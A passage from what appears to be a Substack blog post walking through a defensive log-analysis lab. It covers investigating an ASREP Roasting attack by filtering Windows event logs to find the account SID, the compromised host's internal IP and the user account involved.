srcset="https://substackcdn.com/image/fetch/$s_!poH0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 424w, https://substackcdn.com/image/fetch/$s_!poH0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 848w, https://substackcdn.com/image/fetch/$s_!poH0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 1272w, https://substackcdn.com/image/fetch/$s_!poH0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!poH0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png" width="424" height="380" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:380,&quot;width&quot;:424,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!poH0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 424w, https://substackcdn.com/image/fetch/$s_!poH0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 848w, https://substackcdn.com/image/fetch/$s_!poH0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 1272w, https://substackcdn.com/image/fetch/$s_!poH0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccfc304d-f8fc-42d2-87a7-5b6e18ef31aa_424x380.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>3. What was the SID of the account?</strong></p><ul><li><p>In the same filtered view, locate the <strong>TargetSid</strong> field within the <strong>Payload</strong> column to find the Security Identifier (SID) of the account.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hOii!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hOii!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 424w, https://substackcdn.com/image/fetch/$s_!hOii!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 848w, https://substackcdn.com/image/fetch/$s_!hOii!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 1272w, https://substackcdn.com/image/fetch/$s_!hOii!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hOii!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png" width="844" height="502" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:502,&quot;width&quot;:844,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hOii!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 424w, https://substackcdn.com/image/fetch/$s_!hOii!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 848w, https://substackcdn.com/image/fetch/$s_!hOii!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 1272w, https://substackcdn.com/image/fetch/$s_!hOii!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff139ef5f-a5a0-431c-8dc3-9d981ec4b7f6_844x502.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>4. What is the internal IP address of the compromised asset?</strong></p><ul><li><p>In the same log entry, locate the internal IP address within the <strong>Payload</strong> content.</p></li><li><p>This information is critical for identifying the source machine involved in the attack.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z61T!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z61T!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 424w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 848w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 1272w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z61T!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png" width="1126" height="526" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:526,&quot;width&quot;:1126,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z61T!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 424w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 848w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 1272w, https://substackcdn.com/image/fetch/$s_!Z61T!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88a3e66f-2de3-48e4-9192-5b231dc2d150_1126x526.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>5. What user account was used to perform the ASREP Roasting attack?</strong></p><ul><li><p>Remove the <strong>Event ID 4768</strong> filter and apply a filter for the IP address identified in question 4.</p></li><li><p>The resulting entries will show the user account associated with the source IP address performing the ASREP Roasting attack.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!viz0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!viz0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 424w, https://substackcdn.com/image/fetch/$s_!viz0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 848w, https://substackcdn.com/image/fetch/$s_!viz0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 1272w, https://substackcdn.com/image/fetch/$s_!viz0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!viz0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png" width="1412" height="269" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a96125f0-2b00-4204-85de-64a33281181f_1412x269.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:269,&quot;width&quot;:1412,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!viz0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 424w, https://substackcdn.com/image/fetch/$s_!viz0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 848w, https://substackcdn.com/image/fetch/$s_!viz0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 1272w, https://substackcdn.com/image/fetch/$s_!viz0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa96125f0-2b00-4204-85de-64a33281181f_1412x269.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Conclusion:</strong> This process identifies the timeline, user account, SID, and source IP of the ASREP Roasting attack, enabling further containment and threat-hunting activities. The identification of the compromised machine and user accounts assists in strengthening the incident response and improving security measures to prevent future attacks.</p>]]></content:encoded></item></channel></rss>